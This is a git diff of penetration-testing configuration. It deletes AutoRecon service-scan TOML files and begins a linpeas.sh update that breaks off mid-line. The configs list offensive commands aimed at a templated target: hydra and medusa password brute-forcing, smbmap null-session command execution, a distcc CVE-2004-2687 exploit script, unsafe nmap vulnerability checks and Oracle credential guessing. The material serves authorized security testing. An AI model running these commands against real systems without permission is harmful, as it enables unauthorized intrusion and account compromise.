[default.nmap-full-tcp] - - [default.nmap-full-tcp.service-detection] - command = 'nmap {nmap_extra} -A --osscan-guess --version-all -p- -oN "{scandir}/_full_tcp_nmap.txt" -oX "{scandir}/xml/_full_tcp_nmap.xml" {address}' - pattern = '^(?P\d+)\/(?P(tcp|udp))(.*)open(\s*)(?P[\w\-\/]+)(\s*)(.*)$' - - [default.nmap-top-20-udp] - - [default.nmap-top-20-udp.service-detection] - command = 'nmap {nmap_extra} -sU -A --top-ports=20 --version-all -oN "{scandir}/_top_20_udp_nmap.txt" -oX "{scandir}/xml/_top_20_udp_nmap.xml" {address}' - pattern = '^(?P\d+)\/(?P(tcp|udp))(.*)open(\s*)(?P[\w\-\/]+)(\s*)(.*)$' - -[quick] - - [quick.nmap-quick] - - [quick.nmap-quick.service-detection] - command = 'nmap {nmap_extra} -sV --version-all -oN "{scandir}/_quick_tcp_nmap.txt" -oX "{scandir}/xml/_quick_tcp_nmap.xml" {address}' - pattern = '^(?P\d+)\/(?P(tcp|udp))(.*)open(\s*)(?P[\w\-\/]+)(\s*)(.*)$' - - [quick.nmap-top-20-udp] - - [quick.nmap-top-20-udp.service-detection] - command = 'nmap {nmap_extra} -sU -A --top-ports=20 --version-all -oN "{scandir}/_top_20_udp_nmap.txt" -oX "{scandir}/xml/_top_20_udp_nmap.xml" {address}' - pattern = '^(?P\d+)\/(?P(tcp|udp))(.*)open(\s*)(?P[\w\-\/]+)(\s*)(.*)$' - -[udp] - - [udp.udp-top-20] - - [udp.udp-top-20.port-scan] - command = 'unicornscan -mU -p 631,161,137,123,138,1434,445,135,67,53,139,500,68,520,1900,4500,514,49152,162,69 {address} 2>&1 | tee "{scandir}/_top_20_udp_unicornscan.txt"' - pattern = '^UDP open\s*[\w-]+\[\s*(?P\d+)\].*$' - - [udp.udp-top-20.service-detection] - command = 'nmap {nmap_extra} -sU -A -p {ports} --version-all -oN "{scandir}/_top_20_udp_nmap.txt" -oX "{scandir}/xml/_top_20_udp_nmap.xml" {address}' - pattern = '^(?P\d+)\/(?P(udp))(.*)open(\s*)(?P[\w\-\/]+)(\s*)(.*)$' diff --git a/autorecon_config/service-scans.toml b/autorecon_config/service-scans.toml deleted file mode 100644 index 55197e4..0000000 --- a/autorecon_config/service-scans.toml +++ /dev/null @@ -1,586 +0,0 @@ -# Configurable Variables -username_wordlist = '/usr/share/seclists/Usernames/top-usernames-shortlist.txt' -password_wordlist = '/usr/share/seclists/Passwords/darkweb2017-top100.txt' - -[all-services] # Define scans here that you want to run against all services. - -service-names = [ - '.+' -] - - [[all-services.scan]] - name = 'sslscan' - command = 'if [ "{secure}" == "True" ]; then sslscan --show-certificate --no-colour {address}:{port} 2>&1 | tee "{scandir}/{protocol}_{port}_sslscan.txt"; fi' - -[cassandra] - -service-names = [ - '^apani1' -] - - [[cassandra.scan]] - name = 'nmap-cassandra' - command = 'nmap {nmap_extra} -sV -p {port} --script="banner,(cassandra* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "{scandir}/{protocol}_{port}_cassandra_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_cassandra_nmap.xml" {address}' - -[cups] - -service-names = [ - '^ipp' -] - - [[cups.scan]] - name = 'nmap-cups' - command = 'nmap {nmap_extra} -sV -p {port} --script="banner,(cups* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "{scandir}/{protocol}_{port}_cups_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_cups_nmap.xml" {address}' - -[distcc] - -service-names = [ - '^distccd' -] - - [[distcc.scan]] - name = 'nmap-distcc' - command = 'nmap {nmap_extra} -sV -p {port} --script="banner,distcc-cve2004-2687" --script-args="distcc-cve2004-2687.cmd=id" -oN "{scandir}/{protocol}_{port}_distcc_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_distcc_nmap.xml" {address}' - -[dns] - -service-names = [ - '^domain' -] - - [[dns.scan]] - name = 'nmap-dns' - command = 'nmap {nmap_extra} -sV -p {port} --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "{scandir}/{protocol}_{port}_dns_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_dns_nmap.xml" {address}' - -[finger] - -service-names = [ - '^finger' -] - - [[finger.scan]] - name = 'nmap-finger' - command = 'nmap {nmap_extra} -sV -p {port} --script="banner,finger" -oN "{scandir}/{protocol}_{port}_finger_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_finger_nmap.xml" {address}' - -[ftp] - -service-names = [ - '^ftp', - '^ftp\-data' -] - - [[ftp.scan]] - name = 'nmap-ftp' - command = 'nmap {nmap_extra} -sV -p {port} --script="banner,(ftp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "{scandir}/{protocol}_{port}_ftp_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_ftp_nmap.xml" {address}' - - [[ftp.scan.pattern]] - description = 'Anonymous FTP Enabled!' - pattern = 'Anonymous FTP login allowed' - - [[ftp.manual]] - description = 'Bruteforce logins:' - commands = [ - 'hydra -L "{username_wordlist}" -P "{password_wordlist}" -e nsr -s {port} -o "{scandir}/{protocol}_{port}_ftp_hydra.txt" ftp://{address}', - 'medusa -U "{username_wordlist}" -P "{password_wordlist}" -e ns -n {port} -O "{scandir}/{protocol}_{port}_ftp_medusa.txt" -M ftp -h {address}' - ] - -[http] - -service-names = [ - '^http', -] - -ignore-service-names = [ - '^nacn_http$' -] - - [[http.scan]] - name = 'nmap-http' - command = 'nmap {nmap_extra} -sV -p {port} --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "{scandir}/{protocol}_{port}_http_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_{scheme}_nmap.xml" {address}' - - [[http.scan.pattern]] - description = 'Identified HTTP Server: {match}' - pattern = 'Server: ([^\n]+)' - - [[http.scan.pattern]] - description = 'WebDAV is enabled' - pattern = 'WebDAV is ENABLED' - - [[http.scan]] - name = 'curl-index' - command = 'curl -sSik {scheme}://{address}:{port}/ -m 10 2>&1 | tee "{scandir}/{protocol}_{port}_{scheme}_index.html"' - - [[http.scan.pattern]] - pattern = '(?i)Powered by [^\n]+' - - [[http.scan]] - name = 'curl-robots' - command = 'curl -sSik {scheme}://{address}:{port}/robots.txt -m 10 2>&1 | tee "{scandir}/{protocol}_{port}_{scheme}_robots.txt"' - - [[http.scan]] - name = 'wkhtmltoimage' - command = 'if hash wkhtmltoimage 2> /dev/null; then wkhtmltoimage --format png {scheme}://{address}:{port}/ {scandir}/{protocol}_{port}_{scheme}_screenshot.png; fi' - - [[http.scan]] - name = 'whatweb' - command = 'whatweb --color=never --no-errors -a 3 -v {scheme}://{address}:{port} 2>&1 | tee "{scandir}/{protocol}_{port}_{scheme}_whatweb.txt"' - - [[http.scan]] - name = 'feroxbuster' - command = 'feroxbuster -u {scheme}://{address}:{port} -t 10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -o {scandir}/{protocol}_{port}_{scheme}_feroxbuster.txt' - - [[http.manual]] - description = '(nikto) old but generally reliable web server enumeration tool' - commands = [ - 'nikto -ask=no -h {scheme}://{address}:{port} 2>&1 | tee "{scandir}/{protocol}_{port}_{scheme}_nikto.txt"' - ] - - [[http.manual]] - description = '(feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:' - commands = [ - 'feroxbuster -u {scheme}://{address}:{port} -t 10 -w /usr/share/seclists/Discovery/Web-Content/big.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -o {scandir}/{protocol}_{port}_{scheme}_feroxbuster_big.txt', - 'feroxbuster -u {scheme}://{address}:{port} -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -o {scandir}/{protocol}_{port}_{scheme}_feroxbuster_dirbuster.txt' - ] - - [[http.manual]] - description = '(dirsearch) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:' - commands = [ - 'dirsearch -u {scheme}://{address}:{port}/ -t 16 -r -e txt,html,php,asp,aspx,jsp -f -w /usr/share/seclists/Discovery/Web-Content/big.txt --plain-text-report="{scandir}/{protocol}_{port}_{scheme}_dirsearch_big.txt"', - 'dirsearch -u {scheme}://{address}:{port}/ -t 16 -r -e txt,html,php,asp,aspx,jsp -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --plain-text-report="{scandir}/{protocol}_{port}_{scheme}_dirsearch_dirbuster.txt"' - ] - - [[http.manual]] - description = '(dirb) Recursive directory/file enumeration for web servers using various wordlists (same as dirsearch above):' - commands = [ - 'dirb {scheme}://{address}:{port}/ /usr/share/seclists/Discovery/Web-Content/big.txt -l -r -S -X ",.txt,.html,.php,.asp,.aspx,.jsp" -o "{scandir}/{protocol}_{port}_{scheme}_dirb_big.txt"', - 'dirb {scheme}://{address}:{port}/ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -l -r -S -X ",.txt,.html,.php,.asp,.aspx,.jsp" -o "{scandir}/{protocol}_{port}_{scheme}_dirb_dirbuster.txt"' - ] - - [[http.manual]] - description = '(gobuster v3) Directory/file enumeration for web servers using various wordlists (same as dirb above):' - commands = [ - 'gobuster dir -u {scheme}://{address}:{port}/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -e -k -s "200,204,301,302,307,403,500" -x "txt,html,php,asp,aspx,jsp" -z -o "{scandir}/{protocol}_{port}_{scheme}_gobuster_big.txt"', - 'gobuster dir -u {scheme}://{address}:{port}/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k -s "200,204,301,302,307,403,500" -x "txt,html,php,asp,aspx,jsp" -z -o "{scandir}/{protocol}_{port}_{scheme}_gobuster_dirbuster.txt"' - ] - - [[http.manual]] - description = '(gobuster v1 & v2) Directory/file enumeration for web servers using various wordlists (same as dirb above):' - commands = [ - 'gobuster -u {scheme}://{address}:{port}/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -e -k -l -s "200,204,301,302,307,403,500" -x "txt,html,php,asp,aspx,jsp" -o "{scandir}/{protocol}_{port}_{scheme}_gobuster_big.txt"', - 'gobuster -u {scheme}://{address}:{port}/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k -l -s "200,204,301,302,307,403,500" -x "txt,html,php,asp,aspx,jsp" -o "{scandir}/{protocol}_{port}_{scheme}_gobuster_dirbuster.txt"' - ] - - [[http.manual]] - description = '(wpscan) WordPress Security Scanner (useful if WordPress is found):' - commands = [ - 'wpscan --url {scheme}://{address}:{port}/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "{scandir}/{protocol}_{port}_{scheme}_wpscan.txt"' - ] - - [[http.manual]] - description = "Credential bruteforcing commands (don't run these without modifying them):" - commands = [ - 'hydra -L "{username_wordlist}" -P "{password_wordlist}" -e nsr -s {port} -o "{scandir}/{protocol}_{port}_{scheme}_auth_hydra.txt" {scheme}-get://{address}/path/to/auth/area', - 'medusa -U "{username_wordlist}" -P "{password_wordlist}" -e ns -n {port} -O "{scandir}/{protocol}_{port}_{scheme}_auth_medusa.txt" -M http -h {address} -m DIR:/path/to/auth/area', - 'hydra -L "{username_wordlist}" -P "{password_wordlist}" -e nsr -s {port} -o "{scandir}/{protocol}_{port}_{scheme}_form_hydra.txt" {scheme}-post-form://{address}/path/to/login.php:username=^USER^&password=^PASS^:invalid-login-message', - 'medusa -U "{username_wordlist}" -P "{password_wordlist}" -e ns -n {port} -O "{scandir}/{protocol}_{port}_{scheme}_form_medusa.txt" -M web-form -h {address} -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"', - ] - -[imap] - -service-names = [ - '^imap' -] - - [[imap.scan]] - name = 'nmap-imap' - command = 'nmap {nmap_extra} -sV -p {port} --script="banner,(imap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "{scandir}/{protocol}_{port}_imap_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_imap_nmap.xml" {address}' - -[kerberos] - -service-names = [ - '^kerberos', - '^kpasswd' -] - - [[kerberos.scan]] - name = 'nmap-kerberos' - command = 'nmap {nmap_extra} -sV -p {port} --script="banner,krb5-enum-users" -oN "{scandir}/{protocol}_{port}_kerberos_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_kerberos_nmap.xml" {address}' - -[ldap] - -service-names = [ - '^ldap' -] - - [[ldap.scan]] - name = 'nmap-ldap' - command = 'nmap {nmap_extra} -sV -p {port} --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "{scandir}/{protocol}_{port}_ldap_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_ldap_nmap.xml" {address}' - - [[ldap.scan]] - name = 'enum4linux' - command = 'enum4linux -a -M -l -d {address} 2>&1 | tee "{scandir}/enum4linux.txt"' - run_once = true - ports.tcp = [139, 389, 445] - ports.udp = [137] - - [[ldap.manual]] - description = 'ldapsearch command (modify before running)' - commands = [ - 'ldapsearch -x -D "" -w """ -p {port} -h {address} -b "dc=example,dc=com" -s sub "(objectclass=*) 2>&1 | tee > "{scandir}/{protocol}_{port}_ldap_all-entries.txt"' - ] - -[mongodb] - -service-names = [ - '^mongod' -] - - [[mongodb.scan]] - name = 'nmap-mongodb' - command = 'nmap {nmap_extra} -sV -p {port} --script="banner,(mongodb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "{scandir}/{protocol}_{port}_mongodb_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_mongodb_nmap.xml" {address}' - -[mssql] - -service-names = [ - '^mssql', - '^ms\-sql' -] - - [[mssql.scan]] - name = 'nmap-mssql' - command = 'nmap {nmap_extra} -sV -p {port} --script="banner,(ms-sql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" --script-args="mssql.instance-port={port},mssql.username=sa,mssql.password=sa" -oN "{scandir}/{protocol}_{port}_mssql_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_mssql_nmap.xml" {address}' - - [[mssql.manual]] - description = '(sqsh) interactive database shell' - commands = [ - 'sqsh -U -P -S {address}:{port}' - ] - -[mysql] - -service-names = [ - '^mysql' -] - - [[mysql.scan]] - name = 'nmap-mysql' - command = 'nmap {nmap_extra} -sV -p {port} --script="banner,(mysql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "{scandir}/{protocol}_{port}_mysql_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_mysql_nmap.xml" {address}' - -[nfs] - -service-names = [ - '^nfs', - '^rpcbind' -] - - [[nfs.scan]] - name = 'nmap-nfs' - command = 'nmap {nmap_extra} -sV -p {port} --script="banner,(rpcinfo or nfs*) and not (brute or broadcast or dos or external or fuzzer)" -oN "{scandir}/{protocol}_{port}_nfs_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_nfs_nmap.xml" {address}' - - [[nfs.scan]] - name = 'showmount' - command = 'showmount -e {address} 2>&1 | tee "{scandir}/{protocol}_{port}_showmount.txt"' - -[nntp] - -service-names = [ - '^nntp' -] - - [[nntp.scan]] - name = 'nmap-nntp' - command = 'nmap {nmap_extra} -sV -p {port} --script="banner,nntp-ntlm-info" -oN "{scandir}/{protocol}_{port}_nntp_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_nntp_nmap.xml" {address}' - -[oracle] - -service-names = [ - '^oracle' -] - - [[oracle.scan]] - name = 'nmap-oracle' - command = 'nmap {nmap_extra} -sV -p {port} --script="banner,(oracle* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "{scandir}/{protocol}_{port}_oracle_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_oracle_nmap.xml" {address}' - - [[oracle.scan]] - name = 'oracle-tnscmd-ping' - command = 'tnscmd10g ping -h {address} -p {port} 2>&1 | tee "{scandir}/{protocol}_{port}_oracle_tnscmd_ping.txt"' - - [[oracle.scan]] - name = 'oracle-tnscmd-version' - command = 'tnscmd10g version -h {address} -p {port} 2>&1 | tee "{scandir}/{protocol}_{port}_oracle_tnscmd_version.txt"' - - [[oracle.scan]] - name = 'oracle-tnscmd-version' - command = 'tnscmd10g version -h {address} -p {port} 2>&1 | tee "{scandir}/{protocol}_{port}_oracle_tnscmd_version.txt"' - - [[oracle.scan]] - name = 'oracle-scanner' - command = 'oscanner -v -s {address} -P {port} 2>&1 | tee "{scandir}/{protocol}_{port}_oracle_scanner.txt"' - - [[oracle.manual]] - description = 'Brute-force SIDs using Nmap' - command = 'nmap {nmap_extra} -sV -p {port} --script="banner,oracle-sid-brute" -oN "{scandir}/{protocol}_{port}_oracle_sid-brute_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_oracle_sid-brute_nmap.xml" {address}' - - [[oracle.manual]] - description = 'Install ODAT (https://github.com/quentinhardy/odat) and run the following commands:' - commands = [ - 'python odat.py tnscmd -s {address} -p {port} --ping', - 'python odat.py tnscmd -s {address} -p {port} --version', - 'python odat.py tnscmd -s {address} -p {port} --status', - 'python odat.py sidguesser -s {address} -p {port}', - 'python odat.py passwordguesser -s {address} -p {port} -d --accounts-file accounts/accounts_multiple.txt', - 'python odat.py tnspoison -s {address} -p {port} -d --test-module' - ] - - [[oracle.manual]] - description = 'Install Oracle Instant Client (https://github.com/rapid7/metasploit-framework/wiki/How-to-get-Oracle-Support-working-with-Kali-Linux) and then bruteforce with patator:' - commands = [ - 'patator oracle_login host={address} port={port} user=COMBO00 password=COMBO01 0=/usr/share/seclists/Passwords/Default-Credentials/oracle-betterdefaultpasslist.txt -x ignore:code=ORA-01017 -x ignore:code=ORA-28000' - ] - -[pop3] - -service-names = [ - '^pop3' -] - - [[pop3.scan]] - name = 'nmap-pop3' - command = 'nmap {nmap_extra} -sV -p {port} --script="banner,(pop3* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "{scandir}/{protocol}_{port}_pop3_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_pop3_nmap.xml" {address}' - -[rdp] - -service-names = [ - '^rdp', - '^ms\-wbt\-server', - '^ms\-term\-serv' -] - - [[rdp.scan]] - name = 'nmap-rdp' - command = 'nmap {nmap_extra} -sV -p {port} --script="banner,(rdp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "{scandir}/{protocol}_{port}_rdp_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_rdp_nmap.xml" {address}' - - [[rdp.manual]] - description = 'Bruteforce logins:' - commands = [ - 'hydra -L "{username_wordlist}" -P "{password_wordlist}" -e nsr -s {port} -o "{scandir}/{protocol}_{port}_rdp_hydra.txt" rdp://{address}', - 'medusa -U "{username_wordlist}" -P "{password_wordlist}" -e ns -n {port} -O "{scandir}/{protocol}_{port}_rdp_medusa.txt" -M rdp -h {address}' - ] - -[rmi] - -service-names = [ - '^java\-rmi', - '^rmiregistry' -] - - [[rmi.scan]] - name = 'nmap-rmi' - command = 'nmap {nmap_extra} -sV -p {port} --script="banner,rmi-vuln-classloader,rmi-dumpregistry" -oN "{scandir}/{protocol}_{port}_rmi_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_rmi_nmap.xml" {address}' - -[rpc] - -service-names = [ - '^msrpc', - '^rpcbind', - '^erpc' -] - - [[rpc.scan]] - name = 'nmap-msrpc' - command = 'nmap {nmap_extra} -sV -p {port} --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "{scandir}/{protocol}_{port}_rpc_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_rpc_nmap.xml" {address}' - - [[rpc.manual]] - description = 'RPC Client:' - commands = [ - 'rpcclient -p {port} -U "" {address}' - ] - -[sip] - -service-names = [ - '^asterisk' -] - - [[sip.scan]] - name = 'nmap-sip' - command = 'nmap {nmap_extra} -sV -p {port} --script="banner,sip-enum-users,sip-methods" -oN "{scandir}/{protocol}_{port}_sip_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_sip_nmap.xml" {address}' - - [[sip.scan]] - name = 'svwar' - command = 'svwar -D -m INVITE -p {port} {address}' - -[ssh] - -service-names = [ - '^ssh' -] - - [[ssh.scan]] - name = 'nmap-ssh' - command = 'nmap {nmap_extra} -sV -p {port} --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "{scandir}/{protocol}_{port}_ssh_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_ssh_nmap.xml" {address}' - - [[ssh.manual]] - description = 'Bruteforce logins:' - commands = [ - 'hydra -L "{username_wordlist}" -P "{password_wordlist}" -e nsr -s {port} -o "{scandir}/{protocol}_{port}_ssh_hydra.txt" ssh://{address}', - 'medusa -U "{username_wordlist}" -P "{password_wordlist}" -e ns -n {port} -O "{scandir}/{protocol}_{port}_ssh_medusa.txt" -M ssh -h {address}' - ] -[smb] - -service-names = [ - '^smb', - '^microsoft\-ds', - '^netbios' -] - - [[smb.scan]] - name = 'nmap-smb' - command = 'nmap {nmap_extra} -sV -p {port} --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" --script-args="unsafe=1" -oN "{scandir}/{protocol}_{port}_smb_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_smb_nmap.xml" {address}' - - [[smb.scan]] - name = 'enum4linux' - command = 'enum4linux -a -M -l -d {address} 2>&1 | tee "{scandir}/enum4linux.txt"' - run_once = true - ports.tcp = [139, 389, 445] - ports.udp = [137] - - [[smb.scan]] - name = 'nbtscan' - command = 'nbtscan -rvh {address} 2>&1 | tee "{scandir}/nbtscan.txt"' - run_once = true - ports.udp = [137] - - [[smb.scan]] - name = 'smbclient' - command = 'smbclient -L\\ -N -I {address} 2>&1 | tee "{scandir}/smbclient.txt"' - run_once = true - ports.tcp = [139, 445] - - [[smb.scan]] - name = 'smbmap-share-permissions' - command = 'smbmap -H {address} -P {port} 2>&1 | tee -a "{scandir}/smbmap-share-permissions.txt"; smbmap -u null -p "" -H {address} -P {port} 2>&1 | tee -a "{scandir}/smbmap-share-permissions.txt"' - - [[smb.scan]] - name = 'smbmap-list-contents' - command = 'smbmap -H {address} -P {port} -R 2>&1 | tee -a "{scandir}/smbmap-list-contents.txt"; smbmap -u null -p "" -H {address} -P {port} -R 2>&1 | tee -a "{scandir}/smbmap-list-contents.txt"' - - [[smb.scan]] - name = 'smbmap-execute-command' - command = 'smbmap -H {address} -P {port} -x "ipconfig /all" 2>&1 | tee -a "{scandir}/smbmap-execute-command.txt"; smbmap -u null -p "" -H {address} -P {port} -x "ipconfig /all" 2>&1 | tee -a "{scandir}/smbmap-execute-command.txt"' - - [[smb.manual]] - description = 'Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful:' - commands = [ - 'nmap {nmap_extra} -sV -p {port} --script="smb-vuln-ms06-025" --script-args="unsafe=1" -oN "{scandir}/{protocol}_{port}_smb_ms06-025.txt" -oX "{scandir}/xml/{protocol}_{port}_smb_ms06-025.xml" {address}', - 'nmap {nmap_extra} -sV -p {port} --script="smb-vuln-ms07-029" --script-args="unsafe=1" -oN "{scandir}/{protocol}_{port}_smb_ms07-029.txt" -oX "{scandir}/xml/{protocol}_{port}_smb_ms07-029.xml" {address}', - 'nmap {nmap_extra} -sV -p {port} --script="smb-vuln-ms08-067" --script-args="unsafe=1" -oN "{scandir}/{protocol}_{port}_smb_ms08-067.txt" -oX "{scandir}/xml/{protocol}_{port}_smb_ms08-067.xml" {address}' - ] - -[smtp] - -service-names = [ - '^smtp' -] - - [[smtp.scan]] - name = 'nmap-smtp' - command = 'nmap {nmap_extra} -sV -p {port} --script="banner,(smtp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "{scandir}/{protocol}_{port}_smtp_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_smtp_nmap.xml" {address}' - - [[smtp.scan]] - name = 'smtp-user-enum' - command = 'smtp-user-enum -M VRFY -U "{username_wordlist}" -t {address} -p {port} 2>&1 | tee "{scandir}/{protocol}_{port}_smtp_user-enum.txt"' - -[snmp] - -service-names = [ - '^snmp' -] - - [[snmp.scan]] - name = 'nmap-snmp' - command = 'nmap {nmap_extra} -sV -p {port} --script="banner,(snmp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "{scandir}/{protocol}_{port}_snmp-nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_snmp_nmap.xml" {address}' - - [[snmp.scan]] - name = 'onesixtyone' - command = 'onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt -dd {address} 2>&1 | tee "{scandir}/{protocol}_{port}_snmp_onesixtyone.txt"' - run_once = true - ports.udp = [161] - - [[snmp.scan]] - name = 'snmpwalk' - command = 'snmpwalk -c public -v 1 {address} 2>&1 | tee "{scandir}/{protocol}_{port}_snmp_snmpwalk.txt"' - run_once = true - ports.udp = [161] - - [[snmp.scan]] - name = 'snmpwalk-system-processes' - command = 'snmpwalk -c public -v 1 {address} 1.3.6.1.2.1.25.1.6.0 2>&1 | tee "{scandir}/{protocol}_{port}_snmp_snmpwalk_system_processes.txt"' - run_once = true - ports.udp = [161] - - [[snmp.scan]] - name = 'snmpwalk-running-processes' - command = 'snmpwalk -c public -v 1 {address} 1.3.6.1.2.1.25.4.2.1.2 2>&1 | tee "{scandir}/{protocol}_{port}_snmp_snmpwalk_running_processes.txt"' - run_once = true - ports.udp = [161] - - [[snmp.scan]] - name = 'snmpwalk-process-paths' - command = 'snmpwalk -c public -v 1 {address} 1.3.6.1.2.1.25.4.2.1.4 2>&1 | tee "{scandir}/{protocol}_{port}_snmp_snmpwalk_process_paths.txt"' - run_once = true - ports.udp = [161] - - [[snmp.scan]] - name = 'snmpwalk-storage-units' - command = 'snmpwalk -c public -v 1 {address} 1.3.6.1.2.1.25.2.3.1.4 2>&1 | tee "{scandir}/{protocol}_{port}_snmp_snmpwalk_storage_units.txt"' - run_once = true - ports.udp = [161] - - [[snmp.scan]] - name = 'snmpwalk-software-names' - command = 'snmpwalk -c public -v 1 {address} 1.3.6.1.2.1.25.6.3.1.2 2>&1 | tee "{scandir}/{protocol}_{port}_snmp_snmpwalk_software_names.txt"' - run_once = true - ports.udp = [161] - - [[snmp.scan]] - name = 'snmpwalk-user-accounts' - command = 'snmpwalk -c public -v 1 {address} 1.3.6.1.4.1.77.1.2.25 2>&1 | tee "{scandir}/{protocol}_{port}_snmp_snmpwalk_user_accounts.txt"' - run_once = true - ports.udp = [161] - - [[snmp.scan]] - name = 'snmpwalk-tcp-ports' - command = 'snmpwalk -c public -v 1 {address} 1.3.6.1.2.1.6.13.1.3 2>&1 | tee "{scandir}/{protocol}_{port}_snmp_snmpwalk_tcp_ports.txt"' - run_once = true - ports.udp = [161] - -[telnet] - -service-names = [ - '^telnet' -] - - [[telnet.scan]] - name = 'nmap-telnet' - command = 'nmap {nmap_extra} -sV -p {port} --script="banner,telnet-encryption,telnet-ntlm-info" -oN "{scandir}/{protocol}_{port}_telnet-nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_telnet_nmap.xml" {address}' - -[tftp] - -service-names = [ - '^tftp' -] - - [[tftp.scan]] - name = 'nmap-tftp' - command = 'nmap {nmap_extra} -sV -p {port} --script="banner,tftp-enum" -oN "{scandir}/{protocol}_{port}_tftp-nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_tftp_nmap.xml" {address}' - -[vnc] - -service-names = [ - '^vnc' -] - - [[vnc.scan]] - name = 'nmap-vnc' - command = 'nmap {nmap_extra} -sV -p {port} --script="banner,(vnc* or realvnc* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" --script-args="unsafe=1" -oN "{scandir}/{protocol}_{port}_vnc_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_vnc_nmap.xml" {address}' diff --git a/linpeas.sh b/linpeas.sh index cd02365..b36ff0a 100755 --- a/linpeas.sh +++ b/linpeas.sh @@ -1,6 +1,6 @@ #!/bin/sh -VERSION="v3.2.6" +VERSION="ng" ADVISORY="This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission." ########################################### @@ -30,6 +30,10 @@ SED_RED_YELLOW="${C}[1;31;103m&${C}[0m" BLUE="${C}[1;34m" SED_BLUE="${C}[1;34m&${C}[0m" ITALIC_BLUE="${C}[1;34m${C}[3m" +LIGHT_MAGENTA="${C}[1;95m" +SED_LIGHT_MAGENTA="${C}[1;95m&${C}[0m" +LIGHT_CYAN="${C}[1;96m" +SED_LIGHT_CYAN="${C}[1;96m&${C}[0m" LG="${C}[1;37m" #LightGray SED_LG="${C}[1;37m&${C}[0m" DG="${C}[1;90m" #DarkGray @@ -45,7 +49,7 @@ ITALIC="${C}[3m" # --) FAST - Do not check 1min of procceses and su brute # --) SUPERFAST - FAST & do not search for special filaes in all the folders -if [ "`uname 2>/dev/null | grep 'Darwin'`" ] || [ "`/usr/bin/uname 2>/dev/null | grep 'Darwin'`" ]; then MACPEAS="1"; else MACPEAS=""; fi +if uname 2>/dev/null | grep -q 'Darwin' || /usr/bin/uname 2>/dev/null | grep -q 'Darwin'; then MACPEAS="1"; else MACPEAS=""; fi FAST="1" #By default stealth/fast mode SUPERFAST="" NOTEXPORT="" @@ -57,9 +61,10 @@ WAIT="" PASSWORD="" NOCOLOR="" VERBOSE="" -THREADS="`((grep -c processor /proc/cpuinfo 2>/dev/null) || ((command -v lscpu >/dev/null 2>&1) && (lscpu | grep '^CPU(s):' | awk '{print $2}')) || echo -n 2) | tr -d "\n"`" +AUTO_NETWORK_SCAN="" +THREADS="$( ( (grep -c processor /proc/cpuinfo 2>/dev/null) || ( (command -v lscpu 